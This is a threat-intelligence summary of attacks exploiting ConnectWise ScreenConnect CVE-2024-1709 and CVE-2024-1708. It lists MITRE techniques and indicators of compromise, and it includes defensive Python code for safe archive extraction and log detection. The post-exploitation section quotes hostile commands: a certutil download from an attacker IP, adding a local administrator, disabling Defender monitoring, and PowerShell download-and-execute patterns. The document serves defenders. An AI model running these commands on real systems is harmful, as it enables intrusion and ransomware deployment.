Key points
- CVE-2024-1709 is an authentication bypass in ScreenConnect.Web.dll that can be triggered by appending PathInfo to a SetupWizard.aspx POST, allowing unauthorized account creation and RCE when chained.
- CVE-2024-1708 is a ZipSlip-style path traversal in ScreenConnect.Core.dll’s ScreenConnect.ZipFile.ExtractAllEntries, enabling attackers to write arbitrary files (e.g., web shells) to the filesystem.
- Observed attack chains combine both flaws to gain initial access, create accounts, upload payloads, and execute commands leading to full compromise and ransomware deployment.
- Threat actors (Black Basta, Bl00dy, others) used PowerShell, Cobalt Strike beacons, leaked ransomware builders, and remote management tools (ConnectWise, Atera, Syncro) as part of post‑exploitation activities.
- Common post‑compromise actions include account and domain discovery (net.exe, nltest.exe), privilege escalation (adding local admins), defense evasion (disabling Defender), and malware retrieval via certutil, bitsadmin, or PowerShell download commands.
- Multiple IOCs were observed: payload SHA256 hashes, malicious download hosts and IPs, ScreenConnect relay instances, and filenames associated with deployed malware and ransom notes.
- Immediate mitigation recommended: update ConnectWise ScreenConnect to patched versions and monitor for the listed techniques and indicators.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used to gain initial access by exploiting ConnectWise ScreenConnect vulnerabilities (‘Threat actors exploited the ConnectWise Remote Management Vulnerabilities to gain access into victim environments.’)
- [T1059.001] PowerShell – Used to execute malicious download-and-execute chains and scripts (‘Threat actors used PowerShell commands and scripts to execute malicious commands.’)
- [T1087] Account Discovery – Used to enumerate accounts and computers via tools and scripts (‘Threat actors used a variety of tools, such as nltest.exe and net.exe, to discover the network infrastructure inside the compromised environment.’)
- [T1482] Domain Trust Discovery – Used to enumerate domain trusts to plan lateral movement (‘Threat actors used this technique to gather information on domain trust relationships that may be used to identify lateral movement opportunities.’)
- [T1105] Ingress Tool Transfer – Used BITSAdmin and certutil to download additional malware and payloads (‘Threat actors used the BITSAdmin and certutil tool to download additional malware.’)
- [T1219] Remote Access Software – Abused remote management tools (ConnectWise, Atera, Syncro) to run commands on victims (‘Adversaries in this report have abused remote management software such as Connectwise, Atera, and Syncro to launch malicious commands to victim environments.’)
- [T1562] Impair Defenses – Attempted to disable Windows Defender real-time monitoring via PowerShell (‘Threat actors attempted to disable defense mechanism tools such as Windows Defender.’)
- [T1041] Exfiltration Over C2 Channel – Data theft may occur over established C2 channels used by deployed beacons and malware (‘Adversaries may steal data by exfiltrating it over an existing C&C channel.’)
- [T1486] Data Encrypted for Impact – Ransomware deployment to encrypt data and demand payment (‘Threat actors attempted to encrypt data within victim environments by deploying ransomware.’)
- [T1078.003] Valid Accounts: Domain Accounts – Unauthorized accounts added/abused to access domain resources (‘When an attacker successfully adds unauthorized accounts into the Connectwise Server, those accounts can be abused to execute code.’)
- [T1078.001] Valid Accounts: Local Accounts – Local accounts were created or added to local Administrators groups for persistence and privilege escalation (‘When an attacker successfully adds unauthorized accounts into the Connectwise Server, those accounts can be abused to execute code.’)
Indicators of Compromise
- [File hashes] Malware and payload SHA256 examples – 11d2dde6c51e977ed6e3f3d3e256c78062ae41fe780aefecfba1627e66daf771, 8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600, and 6 other hashes
- [Domains / C2 hosts] Command-and-control and download hosts – wipresolutions[.]com, *.dns.artstrailreviews[.]com, and other domains (e.g., transfer[.]sh, paste[.]ee)
- [IP addresses] Malicious download/C2 IPs used in campaigns – 159[.]65[.]130[.]146, 23[.]26[.]137[.]225, and other IPs observed (e.g., 207[.]246[.]74[.]189)
- [File names] Downloaded and dropped artifact names – Diablo.log, msappdata.msi, chromeset.exe (ransomware dropped Read_instructions_To_Decrypt.txt and appended .CRYPT)
- [URLs / relay] ScreenConnect relay and download URLs – instance-tj4lui-relay.screenconnect[.]com, hxxps://transfer[.]sh/get/HcrhQuN0YC/temp3[.]exe, and paste[.]ee download links
ConnectWise ScreenConnect CVE-2024-1709 (authentication bypass) stems from improper handling of the .NET HttpRequest.Path in ScreenConnect.Web.dll’s SetupModule onPostMapRequestHandler; an attacker can append a PathInfo trailer to a SetupWizard.aspx HTTP POST to initiate the SetupWizard and create unauthorized accounts, which can then be abused for code execution. CVE-2024-1708 is a path‑validation flaw in ScreenConnect.Core.dll’s ScreenConnect.ZipFile.ExtractAllEntries that permits ZipSlip-style directory traversal, allowing attackers to extract arbitrary files (for example, web shells) into target filesystem locations. Combined, these flaws enable trivial exploit chains that lead to full remote code execution when attackers upload and execute payloads.
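The CVE-2024-1708 class of bug is a missing destination check on archive entry names. The following is an added illustration, not ScreenConnect's code and not from the Trend Micro report: a hardened extractor that resolves every entry against the destination root and rejects anything that escapes it, exercised against a constructed in-memory archive (the entry names and the `extract_safely`/`run_demo` helpers are assumptions for the example).

```python
import io
import os
import tempfile
import zipfile


def is_safe_member(dest_dir: str, member_name: str) -> bool:
    """Return True only if the archive entry resolves inside dest_dir.

    This is the check a ZipSlip-style extractor lacks: entry names are
    attacker-controlled and may carry '..' segments or absolute paths.
    """
    dest_root = os.path.realpath(dest_dir)
    # Treat '\' as a separator too; Windows hosts honour both.
    normalized = member_name.replace("\\", "/")
    if normalized.startswith("/") or (len(normalized) > 1 and normalized[1] == ":"):
        return False  # absolute paths and drive letters are never acceptable
    target = os.path.realpath(os.path.join(dest_root, normalized))
    return target == dest_root or target.startswith(dest_root + os.sep)


def extract_safely(zip_bytes: bytes, dest_dir: str):
    """Extract only entries that pass the check; return (extracted, rejected)."""
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not is_safe_member(dest_dir, info.filename):
                rejected.append(info.filename)
                continue
            zf.extract(info, dest_dir)
            extracted.append(info.filename)
    return extracted, rejected


def build_sample_archive() -> bytes:
    """Constructed archive: one benign entry and two traversal attempts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("extension/readme.txt", "benign content")
        zf.writestr("../../webroot/dropped.aspx", "must not be written")
        zf.writestr("..\\..\\escaped.txt", "must not be written")
    return buf.getvalue()


def run_demo():
    """Extract the constructed archive into a scratch directory and report."""
    with tempfile.TemporaryDirectory() as scratch:
        return extract_safely(build_sample_archive(), scratch)
```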
Observed post-exploitation tooling and commands include reconnaissance and credential discovery (net.exe group “Domain Admins” /domain, nltest.exe /domain_trusts), adding privileged users (net.exe localgroup Administrators Adminis /add), Active Directory enumeration via PowerShell scripts to list recently logged-on machines, and defense evasion (PowerShell: Set-MpPreference -DisableRealtimeMonitoring $true). Malware delivery methods seen in the wild include PowerShell download-and-execute (e.g., iwr / downloadstring IEX patterns), certutil and curl-style downloads (certutil.exe -urlcache -split -f http://23[.]26[.]137[.]225:8084/msappdata.msi), bitsadmin downloads of additional ScreenConnect clients, and msiexec installations for Atera RMM. Deployed payloads included Cobalt Strike beacons, XWorm variants, and multiple ransomware binaries (observed SHA256s), with C2 infrastructure reached over HTTPS/DNS endpoints listed in the indicators.
Detection and response should focus on: monitoring ScreenConnect process invocations that spawn nltest/net/rundll32/bitsadmin/powershell, alerting on unusual SetupWizard.aspx POSTs with PathInfo trailers, scanning for Zip extraction behavior that writes outside expected directories, blocking known malicious download hosts/IPs, and applying ConnectWise/ScreenConnect security updates immediately to mitigate these vulnerabilities and prevent the described chains from succeeding. Read more: https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html
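Two of the detection points above, turned into runnable checks as an added example (not from the report or from ConnectWise): a parser for W3C-style web server lines that flags POSTs to SetupWizard.aspx carrying a PathInfo trailer, and a rule over process-creation events that flags ScreenConnect processes spawning the discovery and download tools named in the text. The log lines, the events and the parent image name `ScreenConnect.ClientService.exe` are constructed assumptions for the example.

```python
import re

# Constructed W3C extended log excerpt (IIS-style field names).
SAMPLE_WEB_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2024-02-20 10:01:02 GET /Login - 200
2024-02-20 10:01:09 POST /SetupWizard.aspx - 200
2024-02-20 10:01:15 POST /SetupWizard.aspx/ - 200
2024-02-20 10:01:21 POST /SetupWizard.aspx/anything - 200
2024-02-20 10:02:00 GET /Host - 200
"""

# Constructed process-creation events: (parent image, child image, command line).
SAMPLE_PROC_EVENTS = [
    ("ScreenConnect.ClientService.exe", "cmd.exe", "cmd /c whoami"),
    ("ScreenConnect.ClientService.exe", "nltest.exe", "nltest /domain_trusts"),
    ("explorer.exe", "powershell.exe", "powershell -c Get-Date"),
    ("ScreenConnect.ClientService.exe", "powershell.exe",
     "Set-MpPreference -DisableRealtimeMonitoring $true"),
]

# A normal setup request is exactly /SetupWizard.aspx; a trailing '/' with
# anything (or nothing) after it is the PathInfo trailer described above.
SETUP_WIZARD_PATHINFO = re.compile(r"^/SetupWizard\.aspx/", re.IGNORECASE)

# Child images the text calls out when spawned from ScreenConnect.
SUSPICIOUS_CHILDREN = {"nltest.exe", "net.exe", "rundll32.exe",
                       "bitsadmin.exe", "powershell.exe"}


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_setup_wizard_pathinfo(text):
    """Return uri-stems of POSTs to SetupWizard.aspx that carry a PathInfo trailer."""
    return [r["cs-uri-stem"] for r in parse_w3c(text)
            if r["cs-method"].upper() == "POST"
            and SETUP_WIZARD_PATHINFO.match(r["cs-uri-stem"])]


def find_screenconnect_spawns(events):
    """Return (child, command line) for suspicious children of ScreenConnect processes."""
    return [(child, cmd) for parent, child, cmd in events
            if parent.lower().startswith("screenconnect")
            and child.lower() in SUSPICIOUS_CHILDREN]
```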